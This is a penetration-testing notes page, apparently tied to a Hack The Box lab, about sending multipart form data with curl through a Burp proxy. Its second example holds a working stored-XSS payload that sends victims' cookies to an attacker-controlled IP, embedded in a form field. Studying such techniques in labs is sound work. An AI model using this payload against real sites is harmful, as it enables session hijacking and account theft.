Manual Testing with cURL

Multipart Forms

This form expects the following fields:

cat_name : text
age : number
birthdate : date
weight : number
cat_photo : file

The curl command to submit this form:

# -X POST is redundant here, as -F implies this
# Can specify a content type in the multipart/form-data using ;type=
curl --proxy 'http://127.0.0.1:8080' \ 
-H "Cookie: cookie_here" \
-F 'cat_name=test' \
-F 'age=5' \
-F 'birthdate=1970-01-01' \
-F 'weight=5' \
-F 'cat_photo=@cat.png;type=image/png' \
http://cat.htb/contest.php

URL Encoded Form Data

The -F or --form flags do not have a URL-encode feature like --data-urlencode, which is a feature of -d. In this case, you'll have to use data stored in a variable or a subshell to send URL-encoded data in the form.

xss_payload=$(<< EOF
<img src=x onerror="document.location='http://10.10.14.126/?cookie='+document.cookie" /> 
EOF
)

# URL-encode the data
xss_payload_encoded=$(echo -n "$xss_payload" | jq -sRr @uri)

# -X POST is redundant here, as -F implies this
# Can specify a content type in the multipart/form-data using ;type=
curl --proxy 'http://127.0.0.1:8080' \ 
-H "Cookie: cookie_here" \
-F "cat_name=${xss_payload_encoded}" \
-F 'age=5' \
-F 'birthdate=1970-01-01' \
-F 'weight=5' \
-F 'cat_photo=@cat.png;type=image/png' \
http://cat.htb/contest.php

Using an Ad-Hoc Nginx Server to Catch-Web Requests

Using an Ad-Hoc Python Web Server to Catch HTTP Client Requests

FFUF

Gobuster

Burp Chromium Browser Always Upgrades to TLS

Constrain Burp Memory Usage

Data Exfiltration

Cookie Theft

Manual Testing with cURL

git-dumper

Mining Data from Git Repos

jq

Finding Build Manifests

Install Ghauri on Kali Linux

Multipart Forms and Boundary Parameters

Manual Enumeration with Nmap

Manual Testing with cURL

Multipart Forms

URL Encoded Form Data